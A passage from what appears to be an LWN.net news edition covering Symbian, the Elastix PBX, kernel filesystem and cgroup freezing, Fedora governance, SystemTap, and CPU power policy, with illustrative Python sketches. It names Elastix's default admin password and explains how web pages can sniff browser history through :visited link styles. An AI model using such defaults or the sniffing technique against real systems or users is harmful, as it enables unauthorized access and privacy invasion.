many ways, a battle for developer mindshare.  LiMo, Android, and OpenMoko are all
Linux-based development platforms that support multiple hardware devices,
which should allow applications to run on many different mobile devices
with minimal porting.  How well that works in practice is still an open
question.  


For many of the established players in the mobile device market, Symbian is
a known quantity.  It has shipped on countless devices—its strengths and
weaknesses are well understood.  Turning it into a free software release
will allow, at least potentially, members to move the Symbian code in the
direction they want.
But will that stop, or substantially slow down, the
adoption of Linux-based solutions?

In order for that to happen, Symbian
itself will need some kind of developer community, something like what
currently exists for the kernel and user space applications on Linux.
Whether the opening of the code will be enough to attract that community is
an open question.  It may be that developers at the member companies will
be forced to form that community—something that could affect the bottom line. 


One of the key problems that the various Linux-based efforts face is that
of fragmentation.  The vendors of royalty-based mobile
platforms—primarily Microsoft and Palm—tend to point to the
multiple incompatible Linux efforts as proof.  They tout the control that a
single vendor provides to ensure compatibility.  Others, like Apple and RIM
(maker of Blackberry email phones), do not license their software to others
so they tightly control the hardware, which tends to avoid fragmentation.  


Within a particular initiative, fragmentation is likely to be a very bad
thing, but having multiple platform choices tends to provide healthy
competition and 
thus help consumers.  Over time, some of the current Linux-based platforms
may fall by the wayside to leave fewer choices, but that will likely
happen due to technical considerations, part of which will be determined by
the third-party application developers.


One question remains, though: what happens with Qt, or more specifically
the Qtopia
Phone Edition?  Nokia bought Trolltech early this year, at least
partially for their mobile toolkit.  Will they port it to Symbian and
donate it to the foundation?  They could, of course, port it but keep it
separate, but that would seem to lead down the path toward fragmentation.
It seems somewhat unlikely that they would
change Trolltech's successful hybrid of GPL and commercial licenses, but
before this announcement few thought that Symbian would be freed.  Nokia
has certainly adopted a more open-friendly stance of late—they
clearly see it as a way to generate more business—so it certainly is
not out of the realm of possibility.


While opening up Symbian may inhibit Linux adoption on mobile devices, it
can only be seen as a good thing for consumers and the free software
community as a whole.  In many ways, it validates the free software
development model 
along with the idea of freedom for users and developers.  The competition
between Linux and Symbian will also likely help both improve.  Expect lots
of interesting devices and applications in the next few years because of
it.


		The Elastix PBX system


Elastix is a Linux-based
Private Branch eXchange
(PBX) telephony system that is built on the
CentOS Linux distribution.
Elastix uses the Asterisk
PBX software as its base and adds a number of extensions.
Elastix is being developed by
PaloSanto Solutions.

From the Elastix User Manual [pdf]:


Elastix is an appliance software that integrates the best tools available for
Asterisk-based PBXs into a single, easy-to-use interface. It also adds its
own set of utilities and allows for the creation of third party modules to
make it the best software package available for open source telephony.
The goals of Elastix are reliability, modularity and ease-of-use. These
characteristics added to the strong reporting capabilities make it the best
choice for implementing an Asterisk-based PBX.


Some of the Elastix features include:


 A web-based user interface.
 A built-in help interface.
 Modular design for easy management of features.
 Support for multiple virtualized systems on one platform.
 Can present a variety of system status reports.
 A built-in voicemail system.
 Support for VoIP telephony.
 Support for faxes with fax to email conversion.
 Support for instant messaging.
 A built-in mail server.
 Support for video phones.
 A billing interface.
 Support for automatic outgoing telemarketing calls.
 Multi-language support.


The screen shots show the Elastix user interface in action.


Stable version 1.1 of Elastix was recently announced:


This new version contains updates to more than 130 packages. It also brings together the new "Agenda" module which allows you to access an integrated Calendar and Phone Book in a very user-friendly manner.
The calendar module allows a user to schedule events which can activate automatic phone call reminders.


In addition, version 1.1 brings a Phone Book interface which you should all be pretty familiar with. It lists people's names with their phone numbers. The interesting thing here is that you can click-to-call your contacts in the Phone Book.
And that is not all!
We have placed special emphasis on the end user. Starting with version 1.1 the end user may login to Elastix and find a "Dashboard" with quickly accessible information about personal emails, calendar, faxes, voicemails, etc.


An Elastix 1.1 CD image was downloaded and burned onto a CDROM.  Elastix was
then installed from that CD onto an old 1.4 GHz Athlon machine with a 15GB
hard drive.
To actually use the system, an Asterisk-compatible telephone interface
card should be installed on the host machine.
The system installed with
no problems, booted up and the login screen came up with a message
to access the system via the web on the DHCP-supplied LAN address.


The Elastix web interface was accessed from another local machine.
At this point, the documentation (still at version 0.9) fell short
due to a lack of information on the required username/password.
A little searching on Google revealed the answer (admin/palosanto) in the
online Elastix PBX Installation instructions.


Once logged into the web interface, clicking through the many different
pages showed that the system appeared to be functioning normally.
An incredible array of capabilities exists in the system, and
it looks to be fairly easy to master.
It was not possible to test any real telecom uses due to the lack of
a telephone interface card; adding and configuring a card
can, however, be done after the system has been installed.


If you have a need for a low cost PBX, or simply want an easy way
to play with Asterisk, Elastix is a good way to proceed.


		Freezing filesystems and containers


Freezing seems to be on the minds of some kernel hackers these days;
whether it is the northern summer or southern winter that is causing it is
unclear.  Two recent patches posted to linux-kernel look at freezing
(essentially suspending) two different pieces of the kernel: filesystems and
containers.   For containers, it is a step along the path to being able to
migrate running processes elsewhere, whereas for filesystems it will allow
backup systems to snapshot a consistent filesystem state.  Other than
conceptually, the patches have little to do with each other, but each is
fairly small and self-contained so a combined look seemed in order.


Takashi Sato proposes taking
an XFS-specific feature and moving it into the filesystem code.  The patch
would provide an ioctl() for freezing a filesystem, which suspends write
access to it, along with a thawing option to resume writes.  For
backups that snapshot the state of a filesystem or otherwise operate
directly on the block device, this can ensure that the filesystem is in a
consistent state.


Essentially the patch just exports the freeze_bdev() kernel
function in a user-accessible way.  freeze_bdev() locks a
filesystem into a consistent state by flushing the superblock and syncing the
device.   The patch also adds tracking of the frozen
state to the struct block_device state field.  In its simplest
form, freezing or thawing a filesystem takes a single ioctl() call on
fd, a file descriptor for the mount point; the argument is ignored.
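
As a rough illustration, the freeze and thaw calls might look like the
following Python sketch.  It assumes the FIFREEZE and FITHAW request names
and numbers as they were later defined in mainline <linux/fs.h> (the patch
discussed here may differ) and the generic ioctl number encoding used on x86
and ARM; set_frozen() is a hypothetical helper, not part of the patch.

```python
import fcntl
import os


def _iowr(type_char: str, nr: int, size: int) -> int:
    """Build a read/write ioctl request number (generic Linux layout).

    Assumption: this matches x86 and ARM; a few architectures encode
    the direction and size bits differently.
    """
    direction = 3  # _IOC_READ | _IOC_WRITE
    return (direction << 30) | (size << 16) | (ord(type_char) << 8) | nr


# Assumed values, following _IOWR('X', 119, int) and _IOWR('X', 120, int).
FIFREEZE = _iowr("X", 119, 4)  # flush the filesystem and block writes
FITHAW = _iowr("X", 120, 4)    # allow writes again


def set_frozen(mount_point: str, frozen: bool) -> None:
    """Freeze or thaw the filesystem mounted at mount_point (needs root)."""
    fd = os.open(mount_point, os.O_RDONLY)
    try:
        # In the simplest form of the interface the argument is ignored.
        fcntl.ioctl(fd, FIFREEZE if frozen else FITHAW, 0)
    finally:
        os.close(fd)
```

A backup tool would call set_frozen("/mnt/data", True), take its snapshot,
and then call set_frozen("/mnt/data", False); the mount point is only an
example, and both calls require root privileges.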


In another part of the patchset, Sato adds a timeout value as the argument
to the ioctl().  For XFS compatibility—though courtesy of a
patch by David Chinner, the XFS-specific ioctl() is
removed—a value of 1 for the pointer argument means that the timeout
is not set.  A value of 0 for the argument also means there is no timeout,
but any other value is treated as a pointer to a timeout value in seconds.
It would seem that removing the XFS-specific ioctl() would break
any applications that currently use it anyway, so keeping the compatibility
of the argument value 1 is somewhat dubious.


If the timeout occurs, the filesystem will be automatically thawed.  This
is to protect against some kind of problem with the backup system.  Another
ioctl() flag, FIFREEZE_RESET_TIMEOUT, has been added so
that an application can periodically reset its timeout while it is
working.  If it deadlocks, or otherwise fails to reset the timeout, the
filesystem will be thawed.  A FIFREEZE_RESET_TIMEOUT call made after
that happens will return EINVAL so that the application can
recognize that the thaw has happened.
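
The timeout behavior described above can be modeled with a small Python
class.  This is a toy simulation only: it makes no system calls, the class
and method names are invented for illustration, and time is passed in
explicitly so the behavior is easy to follow.

```python
import errno
from typing import Optional


class FreezeTimeoutModel:
    """Toy model of the proposed freeze timeout; it performs no real I/O."""

    def __init__(self) -> None:
        self.frozen = False
        self.deadline: Optional[float] = None  # None means no timeout is set

    def _expire(self, now: float) -> None:
        # The filesystem is thawed automatically once the deadline passes.
        if self.frozen and self.deadline is not None and now >= self.deadline:
            self.frozen = False
            self.deadline = None

    def freeze(self, now: float, timeout: Optional[float] = None) -> None:
        self.frozen = True
        self.deadline = None if timeout is None else now + timeout

    def reset_timeout(self, now: float, timeout: float) -> None:
        # Models FIFREEZE_RESET_TIMEOUT: only valid while still frozen.
        self._expire(now)
        if not self.frozen:
            raise OSError(errno.EINVAL, "filesystem is no longer frozen")
        self.deadline = now + timeout

    def is_frozen(self, now: float) -> bool:
        self._expire(now)
        return self.frozen
```

A backup application that keeps calling reset_timeout() while it works stays
frozen; one that stalls past the deadline gets EINVAL on its next reset and
learns that its snapshot can no longer be trusted.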


Moving on to containers, 
Matt Helsley posted a patch
which reuses 
the software suspend (swsusp) infrastructure to implement freezing of all
the processes in a control group (i.e. cgroup).
This could be used now to 
checkpoint and restart tasks, but eventually could be used to migrate tasks
elsewhere entirely 
for load balancing or other reasons.  Helsley's patch set is a forward port
of work originally done by Cedric Le Goater.


The first step is to make the freeze option, in the form of the
TIF_FREEZE flag, available to all architectures.  Once that is
done, moving two functions, refrigerator() and
freeze_task(), from the power management subsystem to the new
kernel/freezer.c file makes freezing tasks available even to
architectures that don't support power management.


As is usual for cgroups, controlling the freezing and thawing is done
through the 
cgroup filesystem.  Adding the freezer option when mounting will
allow access to each container's freezer.state file.  This file can be
read to get the current freezer state or written to change it.

It should be noted that it is possible for tasks in a cgroup to be busy
doing something that will not allow them to be frozen.  In that case, the
state would be FREEZING.  Freezing can then be retried by
writing 
FROZEN again, or canceled by writing RUNNING.  Moving the
offending tasks out of the cgroup will also allow the cgroup to be
frozen. If the 
state does reach FROZEN, the cgroup can be thawed by writing
RUNNING.
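
The retry logic described above can be sketched in Python.  This is only an
illustration: the helper names, the retry count, and the delay are
assumptions, as is the /containers/0 path in the usage note; the
freezer.state values are those named in the patch description.

```python
import os
import time


def read_state(cgroup_dir: str) -> str:
    """Return the current contents of the cgroup's freezer.state file."""
    with open(os.path.join(cgroup_dir, "freezer.state")) as f:
        return f.read().strip()


def write_state(cgroup_dir: str, state: str) -> None:
    """Request a new freezer state (FROZEN or RUNNING)."""
    with open(os.path.join(cgroup_dir, "freezer.state"), "w") as f:
        f.write(state)


def thaw_cgroup(cgroup_dir: str) -> None:
    """Thaw the cgroup, or cancel a freeze that is still in progress."""
    write_state(cgroup_dir, "RUNNING")


def freeze_cgroup(cgroup_dir: str, retries: int = 5, delay: float = 0.1) -> bool:
    """Try to freeze a cgroup; return True once it reports FROZEN."""
    for _ in range(retries):
        write_state(cgroup_dir, "FROZEN")
        if read_state(cgroup_dir) == "FROZEN":
            return True
        # FREEZING: some task could not be frozen yet; wait, then retry.
        time.sleep(delay)
    # Give up and cancel the freeze so that no task is left half-frozen.
    thaw_cgroup(cgroup_dir)
    return False
```

With the cgroup filesystem mounted with the freezer option at, say,
/containers, a checkpoint tool could call freeze_cgroup("/containers/0"),
save the state of the tasks, and finish with thaw_cgroup("/containers/0").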


In order for swsusp and cgroups to share the refrigerator(), it is
necessary to ensure that frozen cgroups do not get thawed when swsusp is
waking up the system after a suspend.  
The last patch in the set ensures that thaw_tasks() checks for a
frozen cgroup before thawing, skipping over any that it finds.


There has not been much in the way of discussion about the patches on
linux-kernel, but an ACK from Pavel Machek would seem to be a good sign.
Some comments by Paul Menage, who developed
cgroups, also indicate interest in seeing this feature merged.


		Notes on the Fedora board election


The Fedora Project recently held an election to fill four seats on its
governing board.  This is the first vote to happen since Red Hat decided to
let the community elect the majority of the board's members.  The results
of this vote surprised the Fedora community in a couple of ways, leading to
an extended discussion on how this community should be governing itself -
and whether it can do that at all.


In the end, Tom Callaway, Jesse Keating, and Seth Vidal were elected to the
board for two release cycles, and Jef Spaleta for one cycle.  The fifth
elected seat is currently held by Matt Domsch; three of the appointed seats
are currently held by Bill Nottingham, Karsten Wade, and Harald Hoyer.  Red
Hat has not yet announced who will be put into the fourth appointed seat.
The newly-elected members are all well-known Fedora contributors who have
done a lot for the project.  So why are there questions?  It comes down to
two points:


 Three of the four representatives elected to the board are employed 
     by Red Hat.  So, while Red Hat has given up its ability to directly
     appoint the majority of the board, that board will still be dominated
     by Red Hat employees.

 Of the 4069 Fedora community members who were entitled to vote in this
     election, only 250 actually turned in ballots.  A 6% turnout strikes
     many as being somewhat lower than one would expect from a
     fully-engaged community.


Though nobody said so directly, some people apparently suspected that Red
Hat employees voted in rather larger numbers than anybody else, and that
they duly elected some of their own to fill the board seats.  The truth of
the matter is probably not so simple; what we are seeing is a middle stage
in the Fedora Project's ongoing effort to become a more open,
community-oriented effort.

A few possible reasons for the low turnout were put forward.  One had to do
with how the election was conducted.  The self-nomination process evidently
does not sit well with some people, who would rather see candidates
nominated by their peers.  The range voting mechanism used by the project
seems complex and intimidating - though it still seems simple compared to
the Condorcet scheme employed by Debian.  There were also some complaints
that the election was not run in a sufficiently high-profile manner, to the
point that many community members might not have known that an election was
underway at all.

Greg DeKoenigsberg put forward a different
hypothesis to explain why so few people voted:


	IMHO, a properly functioning governance body *should* be so
	effective that no one cares much either way when it comes time to
	replace the membership.  From my perspective, low turnout means low
	dissatisfaction.  All other indicators seem to point to continued
	success for Fedora and its contributors...
	
	I myself almost didn't vote.  Why?  Because I liked the entire
	slate of candidates.


In this point of view, everybody is so happy that there's no need to get
involved in the process.  There is a contrary
point of view which is also worth considering, though:


	What I mean is that almost all Fedora related decisions come out of
	Red Hat anyway. The few +1 from community seats during FPB meetings
	don't matter, do they? They are just noise.


By this line of reasoning, instead of everybody being happy, the community
is in despair and sees no point in participating in a process which seems
unlikely to change anything.

The truth of the matter is almost certainly somewhere in between.  The
Fedora project has clearly opened considerably in recent years, to the
point that it is one of the most transparent and active distributions out
there.  The community contributes a lot of work and certainly participates
in discussions about the future of the project.  But Red Hat still holds
considerable sway; the fact that it employs a great number of Fedora
developers is, by itself, enough to ensure that.

Red Hat's large presence is also enough to explain the large number of Red
Hat employees elected to the board.  Those are the people who have the
luxury of working on Fedora full time; it is not surprising that they
tend to be the most prominent developers in the community.  Additionally,
there is a certain tendency for outsiders who become strong community
members to eventually become Red Hat employees as well.  Red Hat has been
increasing its investment in Fedora and
hiring a number of people to work on it; the fact that they would be
inclined to hire people who are already doing good work with Fedora should
not be surprising.

So when Fedora developers look at a ballot and think about the names found
there, chances are good that they will vote for the people they have seen
working hard and accomplishing things within the community.  And those
people, at this point, are likely to be Red Hat employees.  Until a time
comes when other companies find it worthwhile to pay full-time Fedora
developers, this situation is not likely to change much.

The free software community is full of examples of company-dominated
projects.  The bulk of these projects are subject to a high degree of
control by the sponsoring company.  That is natural; these companies have
specific needs which they expect their development projects to meet.
Making such projects truly open can be hard.  Red Hat has gone farther than
many in its efforts to make Fedora open, even if said efforts have come
later than some would like.  

Hopefully Red Hat will continue to follow that path, but, to a great
extent, the next steps have to be taken by others.  When the investment
into Fedora from outsiders exceeds Red Hat's investment, Red Hat will be
less of a dominant force.  Until then, efforts to increase the number of
people voting in board elections - while being worthwhile and welcome - are
unlikely to significantly change the results of those elections.

		Leaking browser history


Browser history is fairly sensitive information for most people.  If there
were a way for random web sites to grab a list of other sites you have visited
recently, it would cause a fair amount of concern.  Unfortunately, a
longstanding problem in the HTML Document Object Model (DOM) makes for an
information leak nearly as bad as that.


The problem stems from the handy feature that browsers implement to show
you which links you have already visited.  The way that they show links in
a different color if you have visited them is by turning on the "visited"
style for the link.  Many sites, such as LWN, then change the default
colors for both visited and non-visited links via the site's Cascading Style
Sheet (CSS).  This information gets recorded in the DOM for the page,
which can be queried from Javascript.


Because of the nature of the leak, scripts cannot get a full dump of the
browser's history, but they can get the visited status for a set of sites
they are interested in.  A web site that wishes to gather this kind of
information need only add a link to each site of interest—often in an
unreadable font size or color—and send over a 
bit of Javascript to read the DOM status for each link.
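
The shape of the leak can be shown with a toy simulation in Python.  Nothing
here is real browser code: computed_link_color() stands in for the browser's
styling of a link, probe_history() stands in for the page's script, and the
colors and URLs are made up for the example.  In a real page the lookup
would be a DOM style query made from Javascript.

```python
VISITED_COLOR = "purple"
UNVISITED_COLOR = "blue"


def computed_link_color(url, history):
    """Stand-in for the browser: style a link by whether it was visited."""
    return VISITED_COLOR if url in history else UNVISITED_COLOR


def probe_history(candidates, style_lookup):
    """Stand-in for the page's script.

    The script never sees the history itself; it can only ask how each
    link that it planted on the page has been styled.
    """
    return [url for url in candidates if style_lookup(url) == VISITED_COLOR]
```

The script learns only about the URLs it thought to ask about, which is why
an attacker gets a yes-or-no answer per candidate site instead of a full
dump of the browser's history.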


While this problem has been known since
at least 2002, there is no easy fix while still being compliant with the CSS
standard.  Because of that, most or all browsers are vulnerable.  It has
recently been in the news because it is being used in a
benign, or at least semi-benign, way.


These days many news sites and blogs have small images that correspond to
various social networking sites—digg, reddit and the like—that allow
voting on particular stories or postings.  Those images are buttons that
register a vote or submission of the site that displays them. With the proliferation of
these sites, a great deal of screen real estate was being taken up by these
icons, many of which were not useful because the person viewing them never
visited those particular sites.  


To reduce the clutter, Aza Raskin created some Javascript
code to determine which of the social networking sites a particular
user had visited so that only the icons for those sites were displayed.  Many
people would find that to be a useful hack, one that was fairly minimally
intrusive, which it is at some level.  Others, with stricter views on personal
privacy, might find it more than a bit creepy.


Reducing clutter is one thing, but this technique can be used to gather
much more sensitive information than which of the many social networking
"news" sites you visit.  It is tempting to remind readers of the NoScript Firefox extension, but it has
become increasingly difficult to do nearly anything on the web without
enabling Javascript.  Many sites essentially hide their content behind a
Javascript test, refusing to display it unless Javascript is enabled.


This makes it difficult to avoid giving away some of your browsing history
to dodgy sites—or those with cross-site scripting
vulnerabilities—other than by avoiding them entirely.  It is an
unfortunate side effect of a useful property that, as the discussion on the
Mozilla bugzilla shows, will be difficult to completely eliminate.   It
should be noted that the links do not have to be obfuscated; by adding a
dash of Javascript, LWN could know whether you have visited digg or reddit.  But, of
course, we don't force Javascript on our readers.


		More DTrace envy


Nearly a year ago, we looked at
the status of SystemTap in the context of Sun's much-hyped DTrace
tool.  Since that time there has been progress, but the basic problem
still remains: Linux does not have a good, ready-to-run answer to those wanting
the equivalent functionality of DTrace.  Due to an apparent
disconnect between the developers of SystemTap and the kernel hackers,
tracing for the Linux kernel—never mind user space programs—is
not up to the competition.


Both SystemTap and DTrace are tools
meant to help administrators track down 
performance and other problems on production systems by instrumenting the
kernel.  Because SystemTap has 
not matured to the point of easy usability, DTrace is often seen as a prime
differentiator between Linux and Solaris.  In a posting to
the ksummit-2008-discuss mailing list—where Kernel Summit
topics are considered—Matthew Wilcox brought
up the subject based on 
his experience at a 
recent PostgreSQL conference:

There was a lot of
buzz around DTrace.  Sun and a couple of other companies have put DTrace
hooks into postgres, so they now have some really useful canned queries.
If you're running Solaris or MacOS, of course.

So there was a lot of talk about switching away from Linux.  This can't
possibly be a good thing for us.  I don't personally know what the state
of our competing projects are, but clearly they haven't got their hooks
into postgres ... at least not upstream.


Typically Linux has been in the forefront of interesting new technologies
for free 
operating systems. When Sun opened up Solaris, though, a few features
jumped ahead of their Linux counterparts, in particular the ZFS filesystem
and DTrace.  SystemTap is supposed to provide the tracing functionality
while Btrfs
is the leading candidate for a "next generation" filesystem.  But, so far,
SystemTap has not lived up to its potential.


There are a few reasons for disappointment with SystemTap, some of which were pointed
out by James Bottomley:

When I go around end users, I find people in two camps:  The ones who've
drunk the sun coolaid and won't take anything on linux that isn't a
fully replicated dtrace (sort of like windows people who demand the
availability of outlook on linux) and people who are migrating to Linux
and trying to use systemtap for tracing.  These latter seem to have a
number of genuine concerns including latency, the time it takes to
actually go from command executing to functional trace, the inability to
trace user programs (dtrace can) and concerns about the amount of
perturbation the probes actually place inside the kernel.


Those are all valid concerns, but the biggest problem for users is that,
unless they are knowledgeable about kernel internals, it is difficult to know
how to use SystemTap.  A simpler interface, one that
is less reliant on kernel internals, needs to be created; the way to do
that is through the placement of static trace points in the kernel and the
creation of "tapsets" to make them easily usable.  The SystemTap
developers think the kernel hackers are in the best position to do that work.
Ted Ts'o agrees
but sees some barriers:

The big thing that are missing are the tapsets
— the macro libraries that allow a system administrator to use it to
find and solve performance problems without being a kernel developer,
and more importantly, the documentation for said macro libraries so a
system administrator can actually use it.

[ ... ] the real problem isn't as much kernel
developers, it's that (a) it's too hard for many kernel developers to
use (and so many kernel developers are [not] using it), and (b) there aren't
enough tapsets.  The latter is something that kernel developers can
help solve, but unfortunately I'm not sure discussing it at the Kernel
Summit will necessarily lead to making forward progress.


If the kernel developers have trouble using SystemTap, they are unlikely to
add the tapsets that would make it more usable for system administrators
and others who have some general kernel knowledge but not enough to
sensibly instrument it.  For people using distribution kernels—at least
for the enterprise distributions and Fedora—it is only somewhat
painful to 
get SystemTap up and running.  But kernel hackers tend to run their own
kernels, often many different versions in a short period of time, so they
need to be able to easily build one that works with SystemTap and
includes all of the
debugging information that it requires.


SystemTap developer Frank
Ch. Eigler has a long
reply to many of the complaints in the thread.  It seems clear that the
SystemTap folks and the kernel hackers have not been
communicating—there are solutions to many of the problems that were
cited.  They 
are in various states of readiness, but are mostly
working.  So SystemTap is most of the way there for kernel tracing as
long as you are well-versed in kernel internals, but that has been true for
some time.


In order to get SystemTap to where it needs to be, the kernel hackers need
to be involved.  Building the infrastructure and waiting for tapsets to
magically appear is not a recipe for success.  The SystemTap hackers need
to be engaging the kernel community, as well as distributions, to make the
tool into something that gets used.


SystemTap can use static probe points, kernel markers—merged
into 2.6.24—but it is notable that no one has, as yet, made use of them.
A concerted effort needs to be made to make the tool more usable for the
kernel developers who can, in turn, help make it more usable for others.
There is a clear problem when folks like Ts'o regularly try, but find
it too difficult to be useful:

But maybe as more people try using it, they'll discover some of these
rough edges, and will start trying to fix it.  Every couple of months,
I've tried using it, and because it [h]as so many rough edges, I've
normally found it less work to debug the kernel using manual methods
rather trying to make Systemtap work on my system and with my kernel
development workflow.


It is a commonly heard complaint that while SystemTap is difficult to use,
DTrace "just works" for Solaris; Eigler responds:

Yeah, so I hear, but think about how different their target
environment is.  Their kernel hardly changes (several fixed APIs,
ABIs): this has huge implications.  Their kernel was willing to
insert probes (~ markers), a bunch of build system changes (debug
info subset transcribing).  Here in linux land, we suffer
multifaceted tensions and it is hard to go toward a goal without
obstructions (well-meaning as they may be).

A bunch of third-party scripts are often conflated with "dtrace",
which is just a matter of growing the user community enough, and
giving them a good tool to build on top of.  A growing set of
runnable end-user scripts is already packaged with systemtap,
intended for use by nonexperts, more help (e.g. concise problem
statements about what you'd like to measure/see) would be welcome.


Many administrators and other users of tracing facilities are not
necessarily interested in kernel-level tracing, but would really like to 
be able to use the instrumented versions of things like PostgreSQL.
That is in the plan according to Eigler: "We aim to piggyback on these efforts by reusing the dtrace
instrumentation calls embedded into postgres etc., if at all
possible."


Until the rough edges can be smoothed on the kernel side, 
Bottomley wonders
if it even makes sense to start considering user space:

Although there are
differing opinions about what systemtap could and should do, it's clear
that it's not working incredibly well for its design space: the kernel,
so talking about extending it to userspace is a premature.


DTrace sounds like a nice working solution that has many uses and many
happy users.  If one can ignore the self-congratulatory postings from its
lead developer, it might be worth having in Linux, but that simply is
not going to happen.  Paul Fox is working
on a port of DTrace to Linux, but that ignores the licensing realities
that would never allow it to become part of Linux.  It also ignores the
difficult path a DTrace port would face getting merged
into the mainline.  (We hope to have an article from Mr. Fox on his DTrace
porting work soon; stay tuned.)


For all of the talk out of Sun about how they would love to make DTrace a
part of Linux, they clearly made a choice to ensure that could not happen.
Even if any technical barriers were lifted, the CDDL is not compatible with
the GPL.  It is 
perfectly fine as a free software license, but if you wish to get things
into Linux, they must be licensed in a GPL-compatible way.  This was well
understood at the time Sun freed Solaris, so this must have been a
conscious decision.  Given how much their marketing organization likes to
tout DTrace, 
it would seem to be a choice that Sun is quite happy with.


Linux will eventually get the tracing support it needs, in a way that is
easily accessible to users, but it may take some time.
Conversations like the recent one on ksummit-2008-discuss are an important
part of getting there.  It would appear that better
support for the use cases of kernel developers will be forthcoming.  It is
mostly a 
matter of documentation along with simplifying some of the building and
installation issues.  Once the kernel hackers actually start using it,
progress is likely to be fairly swift.


This is the
way free software development works; it generally does not track a straight
path to a solution, but often wanders about in the solution space for a
while.  It is highly unlikely that a development like DTrace could have
come about in the way that it did in a true community-developed
operating system.  For that you need everyone pulling in the same exact
direction, which may be why Sun is reluctant to turn over much of the
governance of Solaris to the community.  That may help them develop things
more quickly, because there will be fewer barriers, but it won't help them to
foster the kind of development community that characterizes Linux.


		Making power policy just work


The sched_mc_power_savings parameter (cleverly hidden under
/sys/devices/system/cpu) was introduced in the 2.6.18 kernel.  If
this parameter is set to one (the default is zero), it changes the scheduler
load balancing code in an interesting way: it makes an ongoing effort to
gather together processes on the smallest number of CPUs.  If the system is
not heavily loaded, this policy will result in some processors being
entirely idle; those processors can then be put into a deep sleep and left
there for some time.  And that, of course, results in lower power
consumption, which is a good thing.
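
For readers who want to poke at this knob, here is a minimal sketch of reading and setting it from Python.  The file name under /sys/devices/system/cpu is assumed to match the parameter name, and the helper functions are hypothetical; the file will only be present on kernels and hardware which expose this policy, and writing to it requires root.

```python
from pathlib import Path

# Assumed location: the parameter name under the directory the article cites.
SCHED_MC_PATH = Path("/sys/devices/system/cpu/sched_mc_power_savings")


def read_power_savings(path=SCHED_MC_PATH):
    """Return the current setting as an int, or None if the file is absent."""
    try:
        return int(Path(path).read_text().strip())
    except FileNotFoundError:
        return None


def write_power_savings(value, path=SCHED_MC_PATH):
    """Store a new setting; on a real system this requires root."""
    Path(path).write_text(f"{value}\n")
```

Calling read_power_savings() with no arguments reports the current policy; the path argument exists mainly so that the functions can be exercised against an ordinary file.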


Vaidyanathan Srinivasan recently noted that, while this policy
works well in a number of situations, there are others where things could
be better.  The sched_mc_power_savings policy is relatively conservative in
how it loads processes onto CPUs, taking care to not overload those CPUs
and create excessive latency for applications.  As a result, the workload
on a large system can still end up spread out more widely than might be
optimal, especially if the workload is bursty.  In response, Vaidyanathan
suggests making the power savings policy more flexible, with the system
administrator being able to select a combination of power savings and
latency which works well for the workload.  On systems where power savings
matters a lot, a more aggressive mode (which would pack processes more
tightly into CPUs) could be chosen.
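
The tradeoff can be illustrated with a toy model.  This is emphatically not the scheduler's load balancing code; it is a simple first-fit packing sketch in which loads are expressed as a percentage of one CPU, and max_load_per_cpu is a hypothetical stand-in for how aggressively the policy is willing to fill a processor.

```python
def pack_tasks(loads, cpu_count, max_load_per_cpu):
    """Place task loads on as few CPUs as possible (first-fit decreasing).

    loads: per-task load as a percentage of one CPU (toy units).
    max_load_per_cpu: how full a CPU may get before the next one is used;
    a lower value is more conservative, a higher one packs more tightly.
    Returns a list with the total load assigned to each CPU.
    """
    cpus = [0] * cpu_count
    for load in sorted(loads, reverse=True):
        for i in range(cpu_count):
            if cpus[i] + load <= max_load_per_cpu:
                cpus[i] += load
                break
        else:
            # Nothing fits under the limit: fall back to the least-loaded CPU.
            least = min(range(cpu_count), key=lambda i: cpus[i])
            cpus[least] += load
    return cpus


def busy_cpus(cpus):
    """Number of CPUs that have any work and so cannot sleep."""
    return sum(1 for load in cpus if load > 0)
```

With four tasks at 30, 30, 20, and 20 percent on a four-CPU system, a limit of 50 keeps two processors busy, while a limit of 100 packs everything onto one and lets the other three sleep, at the cost of leaving that one processor with no headroom for bursts.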


This suggestion was controversial.  Nobody disputes that a
smarter power savings policy would be a good thing.  But there is resistance
to the idea of creating more tuning knobs to control this policy; instead,
it is felt, the kernel should work out the optimal policy on its own.  As
Andi Kleen puts it:


	Tunables are basically "we give up, let's push the problem to the
	user" which is not nice. I suspect a lot of users won't even know
	if their workloads are bursty or not.  Or they might have workloads
	which are both bursty and not bursty.


There are a couple of answers to that objection.  One is that the system
cannot know, on its own, what priorities the users and/or administrators
have.  Those priorities could even change over time, with performance being
emphasized during peak times and low power usage otherwise.  Additionally,
not all users see "performance" the same way; some want responsiveness and
low latency, while others place a higher priority on throughput.  If the
system cannot simultaneously optimize all of those parameters, it will need
guidance from somewhere to choose the best policy.

And that's where the other answer comes in: that guidance could come from
user space.  Special-purpose software running on large installations can
monitor the performance of important applications and adjust resources (and
policies) to get the desired results.  Or, in a somewhat different vision,
individual applications could register their performance needs and expected
behavior.  In this case, the kernel is charged with somehow mediating
between applications with different expectations and coming up with a
reasonable set of policies.

In the middle of all this, it was pointed out that a mechanism by which
expectations can be communicated to the kernel already exists: the nice
level (priority) associated with each process.  In a simple view of the
world, a process's nice level would tell the kernel how to manage it with
regard to power savings; on a system with a number of niced processes,
those processes would be gathered onto a subset of processors during periods
of relatively low activity.  In essence, this policy says that it is not
worthwhile to power up more processors just to give better throughput to
low-priority processes.

It does not take long, though, to come up with situations where the use of
nice levels leads to the wrong sort of results.  Peter Zijlstra observed that he has niced processes (created
with distcc) which should have access to all of the CPU power available,
but which should not contend with interactive processes on the same
system.  In such cases, those processes should have a high nice value with
regard to CPU usage, but that should not interfere with their ability to
move onto idle CPUs, if any exist.  So the answer may take the form of a
separate "powernice" command which would regulate a process's priority when
it comes to causing the system to draw more power.

Nice levels may (or may not) prove to be sufficient information to let the
system choose an optimal power policy.  But it will be some time before
anybody really knows that; work on optimizing power usage - especially on
server systems - is not in an advanced state.  So pressure to add tuning
knobs for power policies may continue, for one simple reason: people want
ways of experimenting with different policies and seeing what the results
are.  Until we really know what the effects of different policies are - on
both power usage and system performance - it will be hard to build a system
which can choose an optimal policy on its own.

		Netgear's open router


Your editor was recently reminiscing about an early stage of his career,
which involved the administration of a VAX 11/780 computer.  The VAX was a
highly successful product, as was its native operating system VMS.  Quite a
few VAX customers chose to do without VMS, though, and put early versions
of BSD Unix on them instead.  Digital Equipment Corporation never entirely
appreciated those customers.  To DEC, every BSD installation looked like a
lost VMS service contract.  

The company should, instead, have seen those installations as an extra sale
gained as a result of the VAX's ability to run a nice operating system.

Almost 30 years later, some parts of the computing industry have come to
understand that there is value in selling hardware which can run operating
systems provided by others.  Microsoft made that point in a big way, of
course, but there are also significant parts of the industry which benefit
from making systems which can run Linux - and, in particular, a version of
